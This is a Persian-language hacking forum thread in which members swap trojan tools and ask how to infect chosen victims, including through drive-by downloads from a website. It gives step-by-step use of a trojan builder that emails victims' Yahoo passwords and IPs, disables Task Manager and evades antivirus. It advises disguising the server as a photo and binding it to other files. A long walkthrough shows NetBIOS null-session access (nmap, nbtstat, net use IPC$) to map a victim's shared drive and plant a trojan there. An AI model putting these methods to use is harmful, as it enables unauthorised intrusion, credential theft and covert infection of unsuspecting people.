درخواست برنامه اي براي هك كردن

[K053_LSH_KV90]

من 2 سال پيش از tranzhva و mosuker استفاده ميكردم ولي خيلي وقته كه با هك كاري ندارم ولي اگه دوستان لطف كنن و بگن كه برنامه بهتر و قوي تري هم ساخته شده يا نه و اسمش و لينكش رو بدهند ممنون ميشم .
راستي كسي ميدونه كه چطور ميتونيم بجاي فرستادن فايل سرور براي كسي ما خودمون فايل را توي كامپيوترش آپلود كنيم و بعد اجرا كنيم ؟ :?:
قبلا يك راهي رو ديده بودم اين جوري بود كه وقتي كسي سايت ما رو باز كنه فايل ما آپلود ميشه البته فكر كنم internet explore از طرف يك سوال مي پرسيد و اگه yes ميزد فايل توي كامپيوترش اجرا ميشد.
اگه راهنمايي كنين ممنون ميشم 8)

يكي از دوستان ما قبلا يه سايت درست كرده در مورد هك كه اگه توش ريفرش مي دادي سرور كپي ميشد.
راهش اينه كه به جاي يه چيز ديگه بهش قالب كني اين مورد رو بعضي از وبلاگي ها انجام مي دن مثلا ميگن يه فاير وال قوي .....................
====================================
:arrow: :arrow: :arrow: :arrow:

[K053_LSH_KV90]

دوستانی که کار با این تروجان یا هر تروجان بهتر دیگه ای رو بلدند و قبلا هم تست کردند بیان اینجا آموزش بدن بعدش من آموزشهای دیگه اش رو میدم و کاملش میکنم

من قبلا اموزش كار با تروجان نايس رو گذاشته بودم
+++++++====================
اگه بخواين مي تونم در مورد هك وآي پي هم اطلا عاتي بدم
__________________________________________
فرستادن IPطرف مقابل
فرستادنComputer name
مشخص کردن نوع ویندوز طرف همراه با ورژن
فرستادن IDهمراه با پسوورد یاهو شخص مقابل
از کار انداختنTask manager(یعنی طرف نمی تونه از alt+ctrl+deleteاستفاده کنه)
طرف نمی تونه به رجیستری از طریق RUNدسترسی پیدا کنه
تا حالا هم که هیچ آنتی ویروسی نتونسته شناسائیش کنه
وقتی هم که تو کامپیوتر طرف اجرا بشه به همین سادگی ها هم پاک نمیشه
+++++++++++++++++++++++++++++++++++++++++
بعد از دانلود از حالت zipخارجش کنین

بعد به دنبال Nice EditServerبگردید و بازش کنید

تو قسمت Your Yahoo! Mailآدرس ایمیل خودتون رو بنویسین

تو قسمت Server File Nameبرایه فایل خودتون اسم انتخاب کنین (اسم رو بدون پسوند بنویسید)

و سرآخر گزینه ی Saveرو کلیک کنین فایل شما با نامی که براش اتخاب کردین در کنار Nice EditServerظاهر میشه این همون چیزیه که بهش نیاز داریم

حالا شما یه فایل سرور ساختین که می نونین باهاش خیلی کارا بکنین

الان تنها کارتون اینه که این فایلی رو که ساختین برای کسی که می خواین هکش کنین بفرستین و اون با کلیک کردن رویه فایل سرور ما هک شه

حالا چه جوری این فایل رو برای طرف Sendیا ارسال کنیم

اگه طرفتون از هک چیزی بلد نیست پس خیالتون راحت باشه میشه هکش کرد فقط باید یه خورده رو مخش کار کنین تا اون فایلو بگیره و اجرا کنه (می تونین به عنوان عکس براش بفرستین)

ولی اگه احتمال می دین طرف متوجه می شه که فایل سرور براش فرستادین سعی و تلاشتون بیهودست چون هیچ وقت نمی گیرتش ولی شما می تونین فایل سرور رو با یه چیزه دیگه مثل عکس خودتون قاطی کنین طوری که اگه طرف فایل رو گرفت متوجه نمیشه که چه خبره چون فقط عکس میبینه ولی آموزش قاطی کردن فایل ها رو دفعه بعد می زارم اسم برنامشم exebinderهست دفعه بعد یه نرم افزار باحال دارم که میزارم بگیرین با این نرم افزار شکلک های مخفی و آشکار یاهو رو راحت می تونین سند کنین و برایه pmهای مشخصی که طرف میده می تونین جواب مشخصی بزارین که اتوماتیک سند شه اسمش هم IR-ymes!هستش که فارسی هم هست
================================
لينك دانلود
===============================
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[K053_LSH_KV90]

10 سال بود که يونانيها شهر Troy را بدون هيچ نتيجه ای محاصره کرده بودند. سرانجام آنها وانمود کردند که عقب نشينی می کنند و فقط يک اسب بزرگ چوبی از خود به جا گذاشتند که تعدادی از دلاوران آنها از جمله اديسه در آن پنهان شده بودند. تروجنها (اهالی شهر Troy) اسب را به عنوان يک غنيمت جنگی به داخل شهر خود بردند و سرخوش از احساس پيروزی سرگرم جشن شدند. شب هنگام دلاوران يونانی از اسب خارج شدند و با غافلگير کردن تروجنها، شهر تروی را تسخير کردند.

داستان تاريخی بالا که احتمالاً پيش از اين هم آنرا شنيده يا آن را در تلويزيون ديده بوديد بايد ايده ای از اسبهای تروا به شما داده باشد: اسب تروا برنامه ای است که ادعا می کند برنامه ای مفيد و خواستنی است اما در حقيقت هدف ديگری دارد. اسب تروا ممکن است در قالب يک بازی، يک محافظ نمايشگر، يک آلبوم عکس و يا حتی يک ويروس کش به شما فرستاده شود، اما درست هنگامی که شما مشغول لذت بردن از تماشای آن هستيد، رمزهای عبور شما و فايلهايتان را به کسی ارسال کند و يا حتی به آن فرد امکان کنترل سيستم شما و پاک کردن فايلهايتان را بدهد!
==================================
اسبهای تروا را به طور کلی می توان به دو گروه اصلی زير تقسيم کرد:

1- Backdoor Trojans (تروجنهای ايجاد کننده در پشتی): يک اسب تروا از اين نوع به طور کلی از يک فايل ميزبان (server) و يک فايل ارباب رجوع (client) تشکيل می شود که فرد نفوذگر با چسباندن فايل ميزبان (سربازها) به يک فايل مورد علاقه شما (اسب) شما را به سمت اجرای ميزبان روی سيستم خود سوق می دهد. اين فايل پس از اجرا با باز کردن يک پورت روی سيستم آلوده به فرد نفوذگر اجازه می دهد که با استفاده از ارباب رجوع (client) تروجن به ميزبان متصل شود و از اين راه کنترل سيستم شما را بر عهده بگيرد. از ميان اين تروجنها می توان به Sub7، NetBus، Gift و bf/gf اشاره کرد.

2- اسبهای تروای ارسال کننده رمز: چنين تروجنی معمولاً فقط شامل فايلی است که بايد پس از چسبانيده شدن به يک فايل دلخواه برای سيستم هدف ارسال شود. اين تروجن پس از اجرا، رمزهای عبور و برخی اطلاعات ديگر مانند آدرس IP سيستم قربانی را به فرد نفوذگر از طريق ايميل (يا از طريق مسنجرها) ارسال می کند. از معروفترين تروجنهای اين دسته می توان به Ajan و Barok اشاره کرد.

اگرچه معمولاً گفته می شود تفاوت اساسی تروجنها با ويروسها در اين است که يک اسب تروا بر خلاف ويروسها و کرمها توانايی تولد مثل ندارد يعنی ساير فايلهای شما را آلوده نمی کند و خود را به رايانه های ديگر ارسال نمی کند؛ تروجنهايی که خصوصيات ويروسی داشته باشند هم ساخته شده اند. مثلاً Kuang2v تروجنی است که با آلوده کردن فايلهای اجرايی خود را پخش می کند و تمام خصوصيات ديگر تروجنها مانند امکان اتصال از ارباب رجوع ((Client به ميزبان (Server) را هم دارا می باشد.

در يک نگاه دقيقتر به مراحل آلوده سازی يک اسب تروا، مراحل زير را داريم:

1- اسب تروا (همراه با برنامه مفيدی که به آن متصل شده است) روی رايانه هدف، اجرا می شود.

2- اسب تروا يک نسخه از خود را جايی روی هاردديسک کپی می کند (معمولاً در يکی از شاخه های windows، system يا system32). برخی از تروجنها در اين مرحله نسخه اصلی خود را از روی هاردديسک پاک می کنند و فقط نسخه کپی را باقی می گذارند.

3- اسب تروا با دستکاری Registry (يا ساير روشهای مناسب) ترتيبی می دهد که با هر بار اجرای ويندوز، نسخه کپی تروجن نيز اجرا شود.

4- اسب تروا منتظر برقراری ارتباط با اينترنت می ماند و پس از برقراری ارتباط وظيفه خود را انجام می دهد. مثلاً رمزهای عبور فرد قربانی را به فرد نفوذگر ارسال می کند يا با باز کردن پورتی روی سيستم آلوده امکان کنترل آن از راه دور توسط فرد نفوذگر را فراهم می کند.

ذکر اين نکته هم لازم است که برخلاف آنچه ممکن است در ابتدا به نظر برسد، نوشتن يک تروجن معمولی کاری بسيار ساده است و هر فردی که کمی با زبانهای برنامه نويسی ويندوز آشنا باشد می تواند با استفاده از کنترلWinsock به راحتی يک تروجن ساده بنويسد.

[K053_LSH_KV90]

مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاري است که اجازه به اشتراک گذاشتن منابع رو به ما مي‌ده. ما برای به اشتراک گذاشتن فايل‌ها و يا پرينتر مي‌تونيم از اين پروتکل استفاده کنيم. نکته مهم اين است که NetBIOS فقط در سيستم‌عامل ويندوز معني داره (اگرچه ابزارهايي مثل Samba در لينوکس مي‌تونن اونو شبيه سازي کنن ولي بحث ما خود پروتکل NetBIOS است). وقتي NetBIOS در ويندوز فعال باشد، بلافاصله سه تا پورت براي استفاده باز مي‌شوند. پورت مهم و اصلي پورت ۱۳۹ در tcp است که NetBIOS را هم با اين پورت مي‌شناسن. دو پورت ديگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ براي name service و پورت ۱۳۹ براي Datagram service . وقتي قرار باشه که يک سيستم‌عامل ويندوز هک بشه ( خصوصا اگه کلاينت باشه ) يکي از اولين مواردي که به ذهن مي‌رسه، استفاده از NetBIOS ه.



حالا ببينيم منظور از به اشتراک گذاشتن (Sharing) در مورد فايل‌ها و پرينتر‌ها چيست؟



به اشتراک گذاشتن در مورد فايل‌ها يعني قرار دادن تعدادي فايل در يک کامپيوتر خاص به طوريکه توسط ساير کامپيوترها قابل دسترسي و استفاده باشه. در مورد پرينتر به اشتراک گذاشتن يعني طوري چاپگر متصل به يک کامپيوتر را تنظيم کنيم که توسط ساير کامپيوتر‌ها هم قابل استفاده باشه. با توجه به اينکه در سيستم‌عامل‌هاي ويندوز به صورت پيش‌فرض NetBIOS فعال است، پس مي‌توان به تعدادي از فايل‌ها و فولدرهاي تعدادي از کامپيوترهاي روي شبکه دسترسي داشت و فايل‌ها را خواند و حتي کپي يا پاک کرد.



◊ چگونه با پورت ۱۳۹ صحبت کنيم؟
۱- اولين کاري که مي‌کنيم اين است که براي پورت ۱۳۹ پورت اسکن مي‌کنيم تا ip هايي را که پورت ۱۳۹ در آنها باز است، پيدا کنيم. من اين کار را با nmap انجام مي‌دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و به نتيجه زير برسم:


Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):


Port State Service


139/tcp open netbios-ssn


Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP

اين خروجي اعلام مي‌کند که پورت ۱۳۹ باز است. پس مي‌شود از اين ip استفاده کرد.

۲- حالا مي‌خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت ۱۳۹ روش ارتباطي فرق مي‌کند. کامنت پرامت را باز کرده و دستور زير را مي‌نويسم:


nbtstat -A 217.218.84.29

دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامتر‌هاي بسياري است که اگه مي‌خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)
حالا بحث اينه که اين دستور چه‌ کاري مي‌کنه و خروجي به چه صورتي است:
اين دستور به ip مورد نظر وصل مي‌شه و از اون مي‌خواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در اين حالت ۲ حالت ممکنه اتفاق بيوفته:
الف) مواجه با پيغام Host not found بشم. اين يعني اينکه نمي‌تونه ليست منابع را از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹ بازه ولي قابل استفاده نيست.
ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:


NetBIOS Remote Machine Name Table




Name Type Status


---------------------------------------------


HOME-TU6U0AV86Y<00> UNIQUE Registered


MSHOME <00> GROUP Registered


HOME-TU6U0AV86Y<20> UNIQUE Registered


MSHOME <1E> GROUP Registered




MAC Address = 00-53-45-00-00-00


۳- در اين نتايج چيزي که به درد مي‌خوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نمي‌تونين از اشتراک گذاري فايل استفاده کنيد ( به عبارت ساده تر بي‌خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس ادامه مي‌دهيم. حالا مي‌نويسم:


net view \\217.218.84.29

حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته:
الف) پيغام بياد


System error 5 has occurred.




Access is denied.

اين يعني نمي‌تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري مي‌تونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوز‌هاي سري NT جواب ميده. مي‌نويسيد:


net use \\217.218.84.29\IPC$ "" /user:""

حالا چرا مي‌گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد مي‌تونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:


Shared resources at \\217.218.84.29




Share name Type Used as Comment




------------------------------------------------


Printer Print Acrobat PDFWriter


Printer2 Print Acrobat Distiller


SharedDocs Disk


The command completed successfully.

عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي‌نويسم.

۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما مي‌دونيد که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز مي‌کنيد، يک سري آيکون مي‌بينيد که هر کدام اسمي‌ دارند. مثلا :A براي فلاپي و و و تا مي‌رسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اين‌کار حرف بعدي در زبان انگليسي رو به کار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب مي‌کنم و دستور زير را مي‌نويسم:


net use L: \\217.218.84.29\SharedDocs

به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط مي‌گيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب مي‌شنوم:


The command completed successfully.

معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که مي‌تونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ...

۵- وقتي کار تموم شد مي‌تونيد درايو رو حذف کنيد. براي اينکار مي‌تونين روي درايو رايت‌کليک کنيد و Disconnect را انتخاب کنيد. و يا اينکه از دستور


net use /delete L:

استفاده کنيد.
==============================
- وقتي پورت ۱۳۹ رو مي‌بنديد، ديگه نمي‌تونيد از NetBIOS استفاده کنيد ( مگر اينکه دوباره پورت رو به صورت فعال در‌ آوريد). پس وقتي که کسي رو مي‌خواهيد هک کنيد، نياز داريد که براي مدت کوتاهي دوباره پورت رو فعال کنيد.

۲- مي‌بينيد که مثلا براي ويندوز ۲۰۰۰ به سه روش کار کنيد، در اين جدول فقط کافي است يکي رو اعمال کنيد.

۳- اگه بعد از غير فعال کردن، دوباره بخواهيد فعال کنيد، در مرحله آخر هر يک از روش‌هاي بالا، گزينه‌اي که مخالف گزينه ذکر شده در جدول است رو انتخاب کنيد، مثلا اگه در جدول Enabled را نوشته‌ايم، شما Disable را انتخاب کنيد.


==========================
روش کار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتر با پورت باز Share کنم. حالا فايل تروجان ( سرور تروجان ) را upload مي‌کنم به اون کامپيوتر و اسمي براش انتخاب مي‌کنم که طرف مقابل رو به اجراي فايل تشويق کنه. يک اشتباهي که بعضي‌ها مي‌کنند اينه که بعد از کپي کردن تروجان در کامپيوتر هدف، خود هکر مي‌آد و فايل رو دابل کليک مي‌کنه، در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا مي‌شه نه کامپيوتر قرباني. پس ما فقط فايل رو مي‌فرستيم و منتظر مي‌مونيم که طرف مقابل اجرا کنه.

[R£ɀД]

محمد جان ممنون ولي اگه آموزش اون راه رو هم بگي خيلي ممنون ميشم چون خيلي بهش نياز دارم راستش من مي خوام بدون فرستادن فايل سرور اون رو روي كامپيوتر طرف آپلود كنم اگه ممكنه بگو كه چطور ميشه آپلود كرد . لينك دانلود برنامه نايس كار نمي كنه :cry:
در ضمن فكر كنم نايس هم مثل magic ps باشه اگه ميتوني يك برنامه براي كنترل سيستم معرفي كن كه مثل موسوكر يا ترانز هوا باشه

[K053_LSH_KV90]

محمد جان ممنون ولي اگه آموزش اون راه رو هم بگي خيلي ممنون ميشم چون خيلي بهش نياز دارم راستش من مي خوام بدون فرستادن فايل سرور اون رو روي كامپيوتر طرف آپلود كنم اگه ممكنه بگو كه چطور ميشه آپلود كرد . لينك دانلود برنامه نايس كار نمي كنه :cry:
در ضمن فكر كنم نايس هم مثل magic ps باشه اگه ميتوني يك برنامه براي كنترل سيستم معرفي كن كه مثل موسوكر يا ترانز هوا باشه

Let Me Rule v2.0 BETA 8.2
اينو دانلود كن تا اموزش بذارم :arrow:
اين برنامه با دلفي نوشته شدي

[R£ɀД]

محمد جان لينكش رو هم بزاري بد نيست

[R£ɀД]

محمد جان من منظورم از آموزش بيشتر آموزش آپلود كردن سرور بود .
اون روشي كه گفتي براي آپلود خيلي خوب بود دستت درد نكنه ولي اگه بخواهيم كسي را از روش IP پيدا كنيم كه همه شرايط رو برا هك كردن داشته باشه خيلي ناياب هست . من ميخوام فرد خواصي را كه خودمون خواستيم هك كنيم مثلا كسي را كه ID اون را داريم هك كنيم براي همين هست كه مي خوام اون روشي كه با باز كردن سايت ما سرور آپلود ميشه را ياد بگيرم.
شما به همون روشي كه صفحه اول گفتم كه با رفتن به سايت ما سرور آپلود بشه رو بلدي؟ :?:
مثلا در سايت [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] آدرس [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] رو گذاشته و گفته هر كس بره به اين سايت و يك بار Refresh كنه سرور توي كامپيوترش قرار ميگيره . اگه اين روش رو كسي بلد هست لطفا به صورت كامل توضيح بده.

[K053_LSH_KV90]

مثلا در سايت [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] آدرس [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] رو گذاشته و گفته هر كس بره به اين سايت و يك بار Refresh كنه سرور توي كامپيوترش قرار ميگيره . اگه اين روش رو كسي بلد هست لطفا به صورت كامل توضيح بده.

اين كار را يكي از دوستان ما هم انجام داده بود :arrow:

[R£ɀД]

خوب يكي هم بياد به ما آموزش بده :?
راستي محمد جان مرجع پست صفحه قبلت ( 10 سال بود که يونانيها ...) را نگفته بودي ها من كه الان داشتم اون سايتي كه بالا نوشتم رو نيگاه ميكردم ديدم اونجا هم همين نوشته بود
راستي لينك Let Me Rule! 2.0 BETA رو اگه بزاري ممنون ميشم